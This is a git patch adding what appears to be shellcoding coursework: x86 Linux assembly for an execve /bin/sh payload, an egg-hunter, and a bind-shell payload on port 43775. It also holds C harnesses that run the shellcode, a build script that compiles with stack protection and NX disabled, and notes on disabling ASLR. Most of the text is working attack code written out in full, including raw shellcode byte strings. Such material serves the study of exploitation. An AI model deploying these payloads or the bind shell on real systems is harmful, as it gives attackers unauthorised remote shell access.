From fe9bc8f679c9e5e361a9662ab704fa414fc4834a Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Wed, 27 Mar 2013 15:06:53 +0100
Subject: [PATCH] Assignment #3 added

---
 exam1/execve-stack                        | Bin 0 -> 530 bytes
 exam1/execve-stack.o                      | Bin 0 -> 464 bytes
 exam1/shellcode                           | Bin 0 -> 4904 bytes
 exam1/shellcode.c                         |  11 ++
 exam3/NOTES                               |  11 ++
 exam3/USAGE                               |  33 ++++++
 exam3/egg.nasm                            |  32 +++++
 exam3/egghunter.nasm                      |  79 +++++++++++++
 exam3/hunter.nasm                         |  53 +++++++++
 exam3/make.sh                             | 136 ++++++++++++++++++++++
 exam3/payload-execve-stack.nasm           |  44 +++++++
 exam3/payload-shell_bind_tcp_smaller.nasm | 113 ++++++++++++++++++
 exam3/payload.nasm                        |   1 +
 exam3/shellcode                           | Bin 0 -> 5108 bytes
 exam3/shellcode.c                         |  18 +++
 15 files changed, 531 insertions(+)
 create mode 100755 exam1/execve-stack
 create mode 100644 exam1/execve-stack.o
 create mode 100755 exam1/shellcode
 create mode 100644 exam1/shellcode.c
 create mode 100644 exam3/NOTES
 create mode 100644 exam3/USAGE
 create mode 100644 exam3/egg.nasm
 create mode 100644 exam3/egghunter.nasm
 create mode 100644 exam3/hunter.nasm
 create mode 100755 exam3/make.sh
 create mode 100644 exam3/payload-execve-stack.nasm
 create mode 100644 exam3/payload-shell_bind_tcp_smaller.nasm
 create mode 120000 exam3/payload.nasm
 create mode 100755 exam3/shellcode
 create mode 100644 exam3/shellcode.c

diff --git a/exam1/execve-stack b/exam1/execve-stack
new file mode 100755
index 0000000000000000000000000000000000000000..9731f409c35df01d7669142bc93286939d46d6e4
GIT binary patch
literal 530
zcmb<-^>JflWMqH=CI)5(5HF#Dg~J3$uYgLJFem`UH5gbKn85O2VW1iYAZ`J2K$sOI
zC;%c5!0^BZZo^AK8F~7}85#QeNtvCGgMvFB26a9<+W?efG`xMbfkCghGPfi#2}qX|
zLFfz^t0c9e1YsIsmNZZa$o*_U4Dv$)kX8X=7=SrX5GcS569m#A_bVdtL1useh-Lz_
zAVdLBpa95Z0b-DT5DhYu6UqltVDJE_&IrZ<(lGOogy2k&J3$;!$Rn#`Vfgr87$^>t
z7XZpi0r@QxAnFBx@@i;&T{J#JYDH>tS*mVvNn&!gUS48xE<-$!T~xvlAD>iQ3}dIJ
OB$gyH#HZ$^FaQ7yFGbA&

literal 0
HcmV?d00001

diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o
new file mode 100644
index 0000000000000000000000000000000000000000..0992e7ab831d6ec00309aba5db23d10409fae11c
GIT binary patch
literal 464
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXf@FdKl+6yL
znUTaDfa(;H_#iVtKoE$LT~Yv)Z~%(205M2Ehz6M{3FQMRFxUW8Ck5jGX_$F1A;SY3
zxD77_W#s7>XJqK>CuMd%4hrsk7}WXbYy(h^(eU=!2AEnftyhv-QNo~CoKaj-RFaqk
zWL4%uXb2xgF(wDueinw0|B+RIVnP^6Kmg?0)QZ&PvQ*vTlEma}y}ZQYT!wfcyQl=J
F4ggd0E5`r;

literal 0
HcmV?d00001

diff --git a/exam1/shellcode b/exam1/shellcode
new file mode 100755
index 0000000000000000000000000000000000000000..e0c5e3591ac2c9cf88b13bba33a0d09c9130ea2a
GIT binary patch
literal 4904
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

literal 0
HcmV?d00001

diff --git a/exam1/shellcode.c b/exam1/shellcode.c
new file mode 100644
index 0000000..58a3743
--- /dev/null
+++ b/exam1/shellcode.c
@@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = "\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
diff --git a/exam3/NOTES b/exam3/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program
diff --git a/exam3/USAGE b/exam3/USAGE
new file mode 100644
index 0000000..e78563b
--- /dev/null
+++ b/exam3/USAGE
@@ -0,0 +1,33 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+I'm using a symlink as follows
+
+exam3$ ln -svf payload-execve-stack.nasm payload.nasm
+`payload.nasm' -> `payload-execve-stack.nasm'
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+exam3$ ./make.sh "cust.egg"
+ [I] Using custom EGG mark: cust.egg
+ [+] Compiling payload.nasm ...
+ [+] Compiling egg.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting EGG code from egg ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+exam3$ ./shellcode 
+Hunter Length:  37
+Payload Length:  43
+sh-4.1$ 
+
diff --git a/exam3/egg.nasm b/exam3/egg.nasm
new file mode 100644
index 0000000..1de4fa9
--- /dev/null
+++ b/exam3/egg.nasm
@@ -0,0 +1,32 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: egg.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .text
+global _start
+
+_start:
+	;db "Egg-Mark"	; QWORD egg marker - will be appended in shellcode.c after running 'make.sh'
+
+	; loop counter = 8
+	xor ecx, ecx
+	mov cl, 8
+decloop:
+	dec eax
+	loop decloop
diff --git a/exam3/egghunter.nasm b/exam3/egghunter.nasm
new file mode 100644
index 0000000..90b829a
--- /dev/null
+++ b/exam3/egghunter.nasm
@@ -0,0 +1,79 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: egghunter.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+	jmp short EggPoint
+
+continue:
+	pop eax
+
+	; Searching for the Egg marker
+next:
+	inc eax		; Searching backwards
+isEgg:
+	cmp dword [eax-8], egg1
+	jne next
+	cmp dword [eax-4], egg2
+	jne next
+	call eax
+
+	; EXIT
+	xor eax, eax
+	mov al, 1
+	xor ebx, ebx
+	int 0x80
+
+EggPoint:
+	call continue
+
+Egg:
+	db "Egg-Mark"	; QWORD egg marker
+
+	; loop counter = 8
+	xor ecx, ecx
+	mov cl, 8
+decloop:
+	dec eax
+	loop decloop
+
+	mov ecx, eax
+	xor edx, edx
+	mov dl, 8
+	xor eax, eax
+	mov al, 4
+	xor ebx, ebx
+	mov bl, 1
+	int 0x80
+
+	xor eax, eax
+	mov al, 1
+	xor ebx, ebx
+	int 0x80
+
+
diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm
new file mode 100644
index 0000000..c451391
--- /dev/null
+++ b/exam3/hunter.nasm
@@ -0,0 +1,53 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+	jmp short EggPoint
+
+continue:
+	pop eax
+
+	; Searching for the Egg marker
+next:
+	inc eax		; Searching backwards
+isEgg:
+	cmp dword [eax-8], egg1
+	jne next
+	cmp dword [eax-4], egg2
+	jne next
+	call eax
+
+	; EXIT
+	xor eax, eax
+	mov al, 1
+	xor ebx, ebx
+	int 0x80
+
+EggPoint:
+	call continue
diff --git a/exam3/make.sh b/exam3/make.sh
new file mode 100755
index 0000000..96d7355
--- /dev/null
+++ b/exam3/make.sh
@@ -0,0 +1,136 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload egg.o egg hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling egg.nasm ..."
+nasm -f elf32 -o egg.o egg.nasm
+ld -m elf_i386 -o egg egg.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting EGG code from egg ..."
+EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload egg.o egg hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/payload-execve-stack.nasm b/exam3/payload-execve-stack.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/payload-execve-stack.nasm
@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+
diff --git a/exam3/payload-shell_bind_tcp_smaller.nasm b/exam3/payload-shell_bind_tcp_smaller.nasm
new file mode 100644
index 0000000..7eae9b0
--- /dev/null
+++ b/exam3/payload-shell_bind_tcp_smaller.nasm
@@ -0,0 +1,113 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: payload-shell_bind_tcp_smaller.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+; DESC:
+; - Binds to a port 43775
+; - Execs Shell on incoming connection
+;
+;
+; Shellcode size: 108 bytes
+; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
+;
+; Port is the last two bytes of the shellcode. In hex \xaa\xff  (0xaaff = 43775)
+;
+;
+
+global _start
+
+section .text
+
+_start:
+	xor eax, eax
+	mov al, 102		; socketcall
+	xor ebx, ebx
+	inc ebx			; 1 = SYS_SOCKET socket()
+	push BYTE 6		; IPPROTO_TCP	|| 	int protocol);
+	push BYTE 1		; SOCK_STREAM	|| 	int type,
+	push BYTE 2		; AF_INET	|| socket(int domain,
+	mov ecx, esp		; ECX - PTR to arguments for socket()
+	int 0x80
+	mov esi, eax		; save socket fd in ESI for later
+
+
+	jmp short call_get_port
+port_in_esp:
+	pop edi			; getting port address from ESP
+
+	push BYTE 102
+	pop eax			; socketcall
+	inc ebx			; 2 = SYS_BIND bind()
+	xor edx, edx
+	push edx		; 0 = ANY HOST (0.0.0.0)}		||		struct in_addr sin_addr (unsigned long s_addr) };
+	push WORD [edi]		; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
+	push WORD bx		; 2 = AF_INET				|| struct sockaddr { short sin_family,
+	mov ecx, esp		; Save PTR to sockaddr struct in ECX
+	push BYTE 16		; 	socklen_t addrlen);
+	push ecx		; 	const struct sockaddr *addr,
+	push esi		; bind(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for bind()
+	int 0x80
+
+
+	mov BYTE al, 102	; socketcall
+	inc ebx
+	inc ebx			; 4 = SYS_LISTEN listen()
+	push BYTE 1		; 	int backlog);
+	push esi		; listen(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for listen()
+	int 0x80
+
+
+	mov BYTE al, 102	; socketcall
+	inc ebx			; 5 = SYS_ACCEPT = accept()
+	push edx		; 	socklen_t *addrlen = 0);
+	push edx		; 	struct sockaddr *addr = NULL,
+	push esi		; listen(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for accept()
+	int 0x80
+
+
+	; dup2 to duplicate sockfd, that will attach the client to a shell
+	; that we'll spawn below in execve syscall
+	xchg eax, ebx		; after EBX = sockfd, EAX = 5
+	push BYTE 2
+	pop ecx
+dup2_loop:
+	mov BYTE al, 63
+	int 0x80
+	dec ecx
+	jns dup2_loop
+
+
+	; spawning as shell
+	xor eax, eax
+	push eax
+	push 0x68732f6e		; '//bin/sh' in reverse
+	push 0x69622f2f		; beginning of '//bin/sh' string is here
+	mov ebx, esp
+	push eax
+	mov edx, esp		; ESP is now pointing to EDX
+	push ebx
+	mov ecx, esp
+	mov al, 11		; execve
+	int 0x80
+
+call_get_port:
+	call port_in_esp
+	db 0xaa, 0xff		; BYTE (43775 in straight hex)
+
diff --git a/exam3/payload.nasm b/exam3/payload.nasm
new file mode 120000
index 0000000..5ba03e3
--- /dev/null
+++ b/exam3/payload.nasm
@@ -0,0 +1 @@
+payload-execve-stack.nasm
\ No newline at end of file
diff --git a/exam3/shellcode b/exam3/shellcode
new file mode 100755
index 0000000000000000000000000000000000000000..a6b04845c29dd39a7732e37e981c45fc03bdb727
GIT binary patch
literal 5108
zcmb7IYiv}<6`ox$umKy4p)CbMuhfN_v|KPXB#=J*1WX(-wjoI=T(5Vp_inS^wRZ0&
z21N?)#sSN=f?D#BDpf*AReq!rQE7z&tsG2vNJMqh{y=@jNgQbjPDNBgqn5D!zL`7D
z+N6;>tFvdmIp55gnLB6h%ze7Cd5h2I6FT`ti6E-U1%lPkCxgmTEesJ9m12chCT63E
zw(3LRKx73}nuW3eq=Yu$>OR;Zi-0M#v2BV>tP2@OMGEVSa%Gog&%*|J85K@K=$Cds
z)J>3Y!bZ6SOrf1VDBHl_2H%thV2ZZ2yzfS9P`{=>5Tt})qiFjs*a7cKb5KIg+C;o_
zZ6dlR5l?1&%}mN%ugcLiIkv4kcFVf#C;L<ZVZFr=&JFENTl(kTTlVC+x@S+__fqAq
z*6%%6{Q>!$1I~|}3qu&l%KR@MdT)gJ;zXWK1~T_+08O9kX5iH`@KWGXjGuj5C>97|
zS+VX^(#p8uv};)c!;Elv8->-h6Q$93(#mG+sOU+@lWv#DxaowQL@g4%THWDzQfzH*
zs;jrwn_dU}cw&Bxia*W~g{eFqFXPi}Qc#?IArPF6L0y5K13gBKN%<2sChjUVI=g$|
z{kGg>AkS)h`$jphgFn4pC=~kNa%bgNpfvw6|HjeAqkAup7B-wm&BDq{_-CEMN_udZ
zy*7?&g_ZQ=&~|N1VtRDg&1)kP)3dXL_#`m&RI2)L|G+!Bi5o5Ltxn4`V0GYc*B<94
z;wOIs<eNvQC9m&?zI)_FbSC@#<3rGACb5e9uIKUp`hWbn>%L7_Gb@IFLnpZr-w9F*
zi~DJo^i5aO`3tkyfG>AGuy^0+u)9hOpZx~;Xg@c(<oFG6`$yc0(=0>go{NDH%L-$c
zM~{*-aU(ZroEB(fAP~yWMMnqDonDN^Fwh<fuxJj7PS<$$5AGBSuT|380PEsV{u&A{
zHiVY5fk9~5E(eOX_l<USnG3%53|+H7kL+p7??kq5bT?LIZgP44LDU{TW5C03j{mDK
zzFzS67u-<Qt-;1}_y`U*meSQ=BfD2P_A9b-7kr!Ur2n2fzkKh0Yv1VL^3bUC$F*>r
